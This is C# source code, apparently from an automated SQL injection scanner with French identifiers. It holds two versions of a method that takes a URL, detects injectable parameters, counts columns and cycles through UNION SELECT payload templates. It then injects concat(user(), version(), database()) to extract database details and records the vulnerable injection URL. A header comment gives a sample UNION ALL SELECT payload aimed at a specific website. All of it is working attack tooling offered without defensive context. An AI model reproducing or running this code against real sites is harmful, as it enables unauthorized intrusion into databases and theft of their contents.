/* * //EXCEPTION * http://www.eatmybrains.com/showreview.php?id=999999.9 union all select [t],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null * * */ public void Analyse(string url) { form.txt_statut_analyse.Invoke((MethodInvoker)(() => { form.txt_statut_analyse.Text = "Analyse: " + url + Environment.NewLine; })); checked { HttpRequete hr = new HttpRequete(); sqli_check vrf = new sqli_check(); sqli_colonne colonne = new sqli_colonne(); string url_inj_point = string.Empty; string inj_point_curr = string.Empty; bool point_trv = false; _url_originale = url; _url_base = url.Split('?')[0]; _param = ch.analyseParam(url); bool[] ok = new bool[2]; ok[0] = vrf.demmareAnalyseFast(url); ok[1] = vrf.demmareAnalyseAvanced(url); if (ok[0] || ok[1]) { int u = 0; //Union Style 1 while (!point_trv && u < _union.Count) { _nbr_colonne = colonne.Compter(_param, _url_base, _union[u]); onFait((u + 1).ToString()); for (int p = 0; p < _param.Count; p++) { _colonne_point = colonne.FindColonneVise(_url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _union[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count), _nbr_colonne); url_inj_point = _url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _union[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count); inj_point_curr = url_inj_point.Replace("[t]", ch.Encode("concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")")); string page = hr.get(inj_point_curr); if (page.Contains(separateur) || page.Contains(s_separateur)) { setResult(page, url_inj_point); point_trv = true; break; } } u++; } } else { form.txt_statut_analyse.Invoke((MethodInvoker)(() => { form.txt_statut_analyse.Text = "Injection char echouer :( "; })); } } }
public string Analyse(string url) { checked { HttpRequete hr = new HttpRequete(); sqli_check vrf = new sqli_check(); sqli_colonne colonne = new sqli_colonne(); string url_inj_point = string.Empty; string inj_point_curr = string.Empty; bool point_trv = false; _url_originale = url; _url_base = url.Split('?')[0]; _param = ch.analyseParam(url); int u = 0; //Union Style 1 while (!point_trv && u < _unionStyle.Count) { _nbr_colonne = colonne.Compter(_param, _url_base, _unionStyle[u]); for (int p = 0; p < _param.Count; p++) { _colonne_point = colonne.FindColonneVise(_url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _unionStyle[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count), _nbr_colonne); url_inj_point = _url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _unionStyle[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count); inj_point_curr = url_inj_point.Replace("[t]", ch.Encode("concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")")); string page = hr.get(inj_point_curr); if (page.Contains(separateur) || page.Contains(s_separateur)) { return(url_inj_point); } } u++; } return("False"); } }